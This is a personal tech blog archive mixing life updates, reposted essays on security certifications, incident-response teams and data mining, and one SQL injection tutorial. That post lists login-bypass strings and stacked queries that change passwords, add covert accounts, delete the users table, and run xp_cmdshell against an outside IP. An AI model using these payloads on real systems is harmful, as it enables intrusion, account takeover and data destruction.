It’s Friday! I have a bunch of meetings today but I think I should be able to get off work early. I have a meet and greet at The Parlor with some guys from Citrix. The Parlor is a pool hall / bar in Bellevue. I hope that will be a good end to the work week.
I changed my WordPress theme because I got tired of my old theme. So far I really like this new theme. It is simple and clean.
The other day I joined Twitter. It is a neat little web app. I am not sure what the staying power of Twitter is but I desided to added a Twitter plug in to my blog. Now my Twitter posts show up on the right hand side of the blog. I guess you could say I jumped all the way into Twitter. I added a Twitter Client to my Blackberry, I am now running a Twitter Client on my blog, and I have a client running on my desktop. I am not really sure what I will continue to post on Twitter but I will try to keep posting.
So in the spirit of promoting Twitter you can following my at http://twitter.com/patricktalmadge.
Here is a great article write by Martin McKeay check it out…
I’ve held my CISSP for coming on 5 years now. I earned my CCNA around the same time, though I’ve let it lapse. Last year I received the SANS GIAC Systems and Network Auditor. I even earned my B.S. in Information Security Management from the University of San Francisco in 2001. Each of these has a place in the security field as do most of the other (though not all) certifications out there. Each one shows that the holder has attained a minimum level of knowledge by whatever testing method the certifying company choses. To varying degrees almost every security related certificate will help you get one step closer to a job. Currently, the CISSP is the top of the heap when it comes to certificates, though the CISA and other ISACA certs appear to be gaining ground in the management level certifications.
I have several pet peeves when it comes to certification. First, being certified denotes very little other than you passed a test. I don’t care if it’s the CISSP, GSEC or any other certification you care to mention, all the cert proves is that at a particular point in time, you had the knowledge required to pass the test. It doesn’t mean you retained the knowledge, it doesn’t mean you understood what you were being tested on. Most importantly, it doesn’t mean you’ll be able to do the job you’re being interviewed for. I’ve met met CISSP’s who don’t understand the basic concepts of security, I’ve met CCIE’s who couldn’t figure out a basic subnetting problem and I’ve met some brilliant security professionals who never held a cert and never wanted to. They just wanted to work in security because it’s what they’re passionate about. If you think that someone can do the job you’re hiring for just because they hold a certain certificate, then your probably going to get a rude awakening some day soon in your hiring process.
Another of my pet peeves is people who complain about the CISSP because it’s not “technical enough”. There’s a very simple reason for that: the CISSP is not a technical certificate! It is not now, nor was it ever meant to be, a technical certification. I know that’s hard for some people to believe, but it’s the truth. If you look at most, if not all, of the technical certifications, they cover a very limited portion of security, while the CISSP tries to cover everything from encryption to physical security. Technical certifications cover security at a very high level or they might cover a very narrow field in depth, but they’re limited in breadth of the knowledge they expect the person being tested to know compared to the CISSP. The CISSP has often been referred to as being “a mile wide and three inches deep.” But it’s not a technical certificate, never has been advertised as a technical certificate and most of the people who hold it agree that the CISSP is a management certificate that’s mainly aimed at showing that you’ve been in security for a few years and are serious enough about it to sit for the test. It’s also one of the certs that’s most likely to get past that HR drone.
I kind of like Daniel Miessler’s writing and think he has some good posts, but he totally misses the point of the CISSP when he complains about CISSPs who can’t program a home network. The CISSP isn’t aimed at testing someone’s ability to program their Linksys router, it’s aimed at testing someone’s ability to think about the philosophy of security. Do they understand the general business drivers behind security, do they understand the the basics of encryption, do they have a clue as to all ten of the domains that the ISC2 is testing for? The testing method the ISC2 uses has some problems, I’ll freely admit. I’m sure there’s a better way to administer the test, even if I don’t know what it is. I hate the fact that the ISC2 has not only allowed but encourages the “cram and test” approach to taking the CISSP test. But I’m not sure that the SANS courses are any different; SANS is just a bit better about providing training while you cram for the test. Every testing strategy has it’s strengths and weaknesses, and some of the choices around the testing are quite plainly made with financial considerations in mind rather than what would make the test a better measure of skills and talents.
When you’re interviewing for a position, you’re interviewing a person, not a certificate. If you’re interviewing a CISSP to be a router jockey, you better hope they have a couple of other certs to back up their claims of knowledge. Or you better have some really good questions for them, preferably both. By definition, the CISSP shows no in depth knowledge of any particular aspect of security. So why would you ever expect a person holding to be an expert in any discipline or even have more than a 3″ depth of knowledge? Because if you do, you don’t understand what the CISSP was designed to show.
Before anyone starts to consider me a CISSP-apologist, let me say that I’ve been seriously considering letting my CISSP lapse for the last couple of years. I haven’t been happy with the direction the ISC2 has taken the last few years. I think diluting the CISSP certificate by creating additional certificates of both lower and higher levels was a mistake aimed at making more money. I don’t think the ISC2 contributes much back to the community at large. And I’m doubtful the board members even understand the needs of the security community any more. The only thing that’s kept me sending in my $85 each year is that holding the CISSP fills in one more box on the HR checklist. Given where I am in my career, I may consider putting ‘former CISSP’ on my resume good enough in a couple of years.
A major attack vector web programmers sometimes forget about is input cleansing. If user inputs are not cleansed prior to submitting the data to the SQL server attackers can submit malicious code to the server. This code can make the server return more data than it should or allow the attacker to delete entire databases.
SQL injection points occur anytime user inputs are not properly cleansed. The most common points of attack are login pages, search pages and URL strings. Attacks are not limited to these points of entry. All user input needs to be correctly cleansed to prevent SQL injection attacks.
SQL injections a simple in theory in which the attack finds an input that is trusted and passed to the SQL server. When the attacker finds a vulnerable input it is time to force the SQL query to return true no matter what the programmer is trying to do.
The most common way to force a SQL statement to return true is to add “‘ OR 1=1–” to a vulnerable input.
Code:
‘ OR 1=1—
Explanation:
‘ : Closes the string that the vulnerable input is looking for.
OR : a logical expression to start allow for another statement. The OR means that if the first statement fails because of the empty entry the entire statement may evaluate to true if the second statement is true.
1=1 : Since 1 will always equal 1 this expression will evaluate to true.
– : Is a comment which forces SQL to ignore everything after the – (dash dash).
Here are a few variations along the same lines as above:
| admin’– ‘ | or 0=0 – |
| ” or 0=0 – | or 0=0 – |
| ‘ or 0=0 # “ | or 0=0 # |
| or 0=0 # ‘ | or ‘x’='x |
| ” or “x”=”x ‘) | or (’x'=’x |
| ‘ or 1=1– “ | or 1=1– |
| or 1=1– ‘ | or a=a– |
| ” or “a”=”a ‘) | or (’a'=’a |
| “) or (”a”=”a hack” | or “a”=”a |
| hack” or 1=1 — hack’ | or 1=1 – |
| hack’ or ‘a’='a hack’) | or (’a'=’a |
| hack”) | or (”a”=”a |
The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample shows how a password can be changed if the table name and an account are know.
Code:
‘; UPDATE ‘users’ SET ‘password’ = ‘hacked’ WHERE username=‘crackable’–
The above code updates the users table where the username is crackable. SET states that the password field for the username crackable will be changed to hacked.
Inserting data into a database is very similar to updating the table. As with the Update this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following example expects that the attacker knows the table and a general structure of the table.
Code:
‘; INSERT INTO ‘users’ (‘id’, ‘username’, ‘password’, ‘details’) VALUES (1203, ‘myaccount’, ‘mypassword’, ‘NA’)–
The above code inserts a new user into the users table. A new account is created with an id of 1203, username of myaccount, password of mypassword, and details of NA. Creating new accounts is less likely to be detected than changing the password of an existing account. If enough table information can be gained to insert a new account in the users database, it is preferred over updating an existing account. If table information cannot be obtained the next best thing would be to change a users password with an update.
Deleting data from a database is very similar to updating and inserting data in a database table. As with the update and the insert this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample requires the attacker to know the table name.
Code:
‘; DELETE FROM ‘users’ –
The above code sample deletes all the data from the users table. In general an attacker would only use this delete command if they wanted to be purely destructive. This command will be discovered very quickly when users are unable to log into the website.
SQL injections can be very powerful. This is an example of a SQL injection attack that can lead to remote execution. The default installation of MS SQL Server runs as local system, which is the same as Administrator. With the follow code stored procedures like master..xp_cmdshell can be executed which would allow and attacker to perform remote executions as if on the box.
Code:
‘; exec master..xp_cmdshell ‘ping 104.12.45.25′–
The semi colon in the statement will end the current SQL query and then allow a new SQL command. To verify that the command executed successfully, a packet sniffer can be used to sniff ICMP packets on 104.12.45.25. If packets are received at 104.12.45.25 from the SQL server the stored procedure was executed successfully.
The other week I found a major security hole in one of the systems at work. I notified my manager who then notified the correct people. I am waiting to see if this issue gets resolved. So far I have not seen any progress towards closing the hole. Lack of motivation to path security holes seems to be a major flaw in big business. That is till the security hole gets exploited, then it is scrabble time.
I have done my part now it is up to the powers that be.
Fun Article from the Security Catalyst. Full Article Here.
In addition to getting to break things in order to help our customers prevent assorted miscreants from doing so, one of the many hats I wear at QuietMove is the amorphous responsibility of ‘business development.’ In English, that means I identify organizations that could benefit from our services, sometimes travel to visit them, often buy them lunch, and explore ways we can help them. Though my background is technical, it’s something I’ve really grown to enjoy because I find it interesting to learn about different industries and business models and their unique security challenges.
That said, I’m often surprised by some of the organizations I visit – it’s shocking that some of the largest organizations in critical economic sectors don’t have security organizations, don’t have security programs, and don’t even have a single person for whom ‘security’ is part of their job description. In other cases, there’s a single ‘security’ person with no budget, staff, or authority. I’ve been that guy, so if that’s you, I feel your pain. I’d like to share an anecdote with you about a large company I visited last week who is in the former category – no security organization at all. If your organization has no security-focused staff, or if you’re the one guy or gal whose shoulders it all falls on, I’m also going to share a strategy for moving your organization in the right direction.
The Meeting
It was a pretty exciting morning – I was heading to an initial face-to-face meeting with a potential customer, one of the largest mining companies in the world. My initial contact was with a gentleman who managed their server environment. At my urging he also invited their application and network team. The meeting was scheduled to discuss assessment activities – something they haven’t been doing, and didn’t have the expertise or tools to do in-house. I asked him to invite the other managers because it was important to get their buy-in, and also because our customers get the best value when we test all attackable surface areas.
What I heard during the meeting was one of the variations on a common theme - each group ‘owned security’ for their sphere of responsibility, but there were no overarching standards, and minimal to no coordination. These guys were all professionals – the problem was organizational. Their company didn’t see a need for dedicated security resources.
Well OK, almost all professionals. One of them questioned what they had that was worth someone breaking in to steal. The look from his colleagues was as if he said his company possessed nothing of value, which is more or less what he said.
I pointed out a few things – they’re a mining company, so the list of what sites they are considering buying or leasing because their geological analysis said it would be a good spot was definitely worth something to their international competitors. Also valuable are their supplier lists, customer lists, and employee information, not to mention their reputation.
If it’s Everybody’s Job, it’s Nobody’s Job
Those who know me well, know I have a tendency to devolve a conversation into pedantic comparisons to obscure philosophical and/or historical topics. Lucky for you, Dear Readers, I’m too much of a lazy typist to inflict this habit on you – for too long.
The attitude at the mining company I visited was that security was “everyone’s” job. That may be, but without guidance from an accountable party, there is no incentive for anyone to perform something that they aren’t being measured against.
I’d like to paint a comparison to the relative physical security of a shopping mall vs. a public street. Shopping malls have a financial incentive to police their premises. After all, most people wouldn’t visit a mall after being mugged at spork-point in the food court after the first time, forget about the second. As a result, mall owners will set stricter codes of acceptable behavior on their premises than you’d see on a city street. Meanwhile people will litter the ground with cigarette butts, soda cans, and chewing gum in public places with a frequency you’d never see in their own home.
This is an important side effect of the concept of private property – with ownership comes responsibility. We see the same attitude in the workplace – when security is the responsibility of ‘everyone,’ it’s really owned by no one. People are measured on the performance of their primary job responsibility – meeting development deadlines, system uptime, etc. There is no central coordination of standards, no one who ‘owns’ testing controls, no security metrics, and ultimately little to no security.
Create a Security Team for $4.95, Plus Tax
That’s about the going rate for a dozen donuts. Yes, it’s that easy.
Back to the mining company – I realized that they had a long way to go. Since they didn’t have enough management buy-in for security to form a security organization, had no budget, and no ownership of responsibility, I shared a strategy whereby they could create one using the resources they have available now – themselves.
My suggestion was to pick trusted, interested persons as Single Points of Contact (SPOC) from key parts of their organization, schedule a conference room plus a dial-in conference bridge number for those at different locations, and invite them all to an informal monthly brown-bag lunch.
Pick out a news story related to a security incident or breach at another company from the news - a good place to look is the SC Magazine Breach Blog - and email it to everyone ahead of time. The purpose of the monthly lunch is to do some tabletop war gaming. What you’ll want to discuss is, if a similar incident affected your organization, how would you respond? What controls are in place to detect it? Who would be notified? What actions would be taken?
There are three goals for your Computer Incident Response Team (CIRT) meeting:
1. Identify a Single Point of Contact (SPOC) and backup contact for each part of the organization that should be involved in an incident or breach. In addition to identifying a contact and backup from system administration and network teams, don’t forget to pick points of contact from groups like telecom, finance, human resources, public relations, physical plant security, and any other towers you think you can pull in. Make a phone list, including cell phone numbers, and distribute it to all members.
2. Build an ad-hoc team that can respond to incidents, by building rapport and familiarity. This is an important point – a phone tree does not a team make. The team will learn to work together, and learn what roles they can play in incident response.
3. When (not if) an incident affects your organization, you will have already run through similar scenarios in your tabletop wargaming exercises. You’ll have a response team consisting of members of each part of your organization that might be affected. Most importantly, you’ll have the resources to effect a coordinated response.
Don’t forget the donuts.
“Data mining for terrorists: It’s an idea that just won’t die. But it won’t find any terrorists, it puts us at greater risk of crimes like identity theft, and it gives the police far too much power in a free society.
The first massive government program to collect dossiers on every American for data mining purposes was called Total Information Awareness. The public found the idea so abhorrent, and objected so forcefully, that Congress killed funding for the program in September 2003. But data mining is like a hydra–chop one head off, two more grow in its place. In May 2004, the General Accounting Office published a report that listed 122 different federal government data mining programs that used people’s personal information. That didn’t include classified military programs like Tangram, or state-run programs like MATRIX.
Now TIA is back with yet another name: Analysis, Dissemination, Visualization, Insight and Semantic Enhancement, or ADVISE. “It’s an experiment to see how you can better analyze data that you already have, that you’ve already legally collected, to see if you can understand it, sort it and make use of it more readily than simply doing it manually,” Homeland Security Chief Michael Chertoff told the Associated Press this month.
The names change, but the basic idea remains the same: suck up as much data as possible about everyone, sift through it with massive computers, and investigate patterns that might indicate terrorist plots. It’s a compelling idea, but it’s wrong. We’re not going to find terrorist plots through data mining, and we’re going to waste valuable resources chasing down false alarms.
Used properly, data mining is a great tool. As a result of data mining, AT&T reduces the costs of cell phone fraud, Amazon.com shows me books I might want to buy, and Google shows me advertising I’m more likely to be interested in. But it only works when there’s (1) a reasonable percentage of attacks per year, (2) a well-defined profile to search for, and (3) and a low cost of false alarms.
Look at one of data mining’s success stories: credit card fraud. All credit card companies data mine their transaction databases, looking for spending patterns that indicate a stolen card. About 1% of cards are stolen and fraudulently used each year in the U.S.; that’s enough of a population to make searching for them effective. There are also common fraud patterns that can be computed from that data, and they’re easy to search for. Additionally, the cost of a false alarm is only a phone call to the cardholder asking him to verify a couple of purchases. Cardholders don’t even resent these phone calls–as long as they’re not too frequent–so the cost is just a few minutes of operator time.
Terrorist plots are different. First, attacks are very rare. This means that even very accurate systems will be so flooded with false alarms that they will be useless: millions of false alarms for every one real attack, even assuming unrealistically accurate systems.
Let’s look at some numbers. Assume an unrealistically optimistic system with a 1-in-100 false positive rate (99% accurate), and a 1-in-1,000 false negative rate (99.9% accurate). That is, while it will mistakenly classify something innocent as a terrorist plot one in a hundred times, it will only miss a real terrorist plot one in a thousand times. Assume one billion possible “plots” to sift through per year, about four per American citizen, and that there is one actual terrorist plot per year.
Even this unrealistically accurate system will generate 10 million false alarms for every real terrorist plot it uncovers. Every day of every year, the police will have to investigate 270,000 potential plots in order to find the one real terrorist plot per month.
In statistics, it’s called the “base rate fallacy,” and it applies in other domains as well. For example, even highly accurate medical tests are useless as diagnostic tools if the incidence of the disease is rare in the general population. Terrorist attacks are also rare, so any “test” is going to result in an endless stream of false alarms.
Second, there is no well defined terrorist profile. In hindsight, it was easy to connect the Sept. 11, 2001 dots and point to the warning signs, but it’s much harder to do so before the fact. Certainly, there are common warning signs that many terrorist plots share, but they share them with non-terrorist events as well. We live in a “six degrees of separation” world, where everyone is connected. Add in the problems of sleeper cells, loner terrorists like the Unabomber, and billions of perfectly innocent plots like surprise birthday parties and corporate takeovers, and you have an impossible problem.
And third, the cost of these false alarms is enormous. It’s not just the cost of the FBI agents running around chasing dead-end leads instead of doing things that might actually make us safer, but also the cost in civil liberties. The fundamental freedoms that make our country the envy of the world are valuable, and not something that we should throw away lightly.
There is something un-American about a government program that uses secret criteria to collect dossiers on innocent people and shares that information with various agencies, all without any oversight. It’s the sort of thing you’d have expected from the former Soviet Union or East Germany, or modern-day China.
Finding terrorism plots is not a problem that lends itself to data mining. It’s a needle-in-a-haystack problem, and throwing more hay on the pile doesn’t make the problem any easier. Real security comes from old-fashioned investigative work: putting people in charge of investigating potential plots and letting them direct the computers, instead of putting the computers in charge and letting them decide who should be investigated. It’s what caught the London liquid bombers last summer, and it’s our best hope for our own security in the future.”
My Netflix account now has the new Watch Now feature. I have watched two movies with Watch Now and I am very impressed. The movies start streaming quickly and pay back is very smooth with little or no buffering issues. Netflix has done a great job with Watch Now. They have obviously spent some time and money developing this feature, I am very pleased. Now the only problem I have is I will need build a new media PC so I can watch movies on my TV.
My new job is keeping me very busy. I have been working around 50 hours a week and with the drive time I am away from home for 12 hours a day.
My class has been going well. I am almost done with the second class of the series of classes. I am hoping to have more time once my classes is over. Then I should be able to post more.
My new job is going well. It is keeping me very busy. I am really enjoying the work. The last few days I have been sick. I seem to be all better now. I am looking forward to getting a schedule going again. Getting a schedule back should allow me to do the reading I want to do and start working out again.
My class are going well also. We got our class project and I am on the hacker team. Should be a lot of fun.
Recent Comments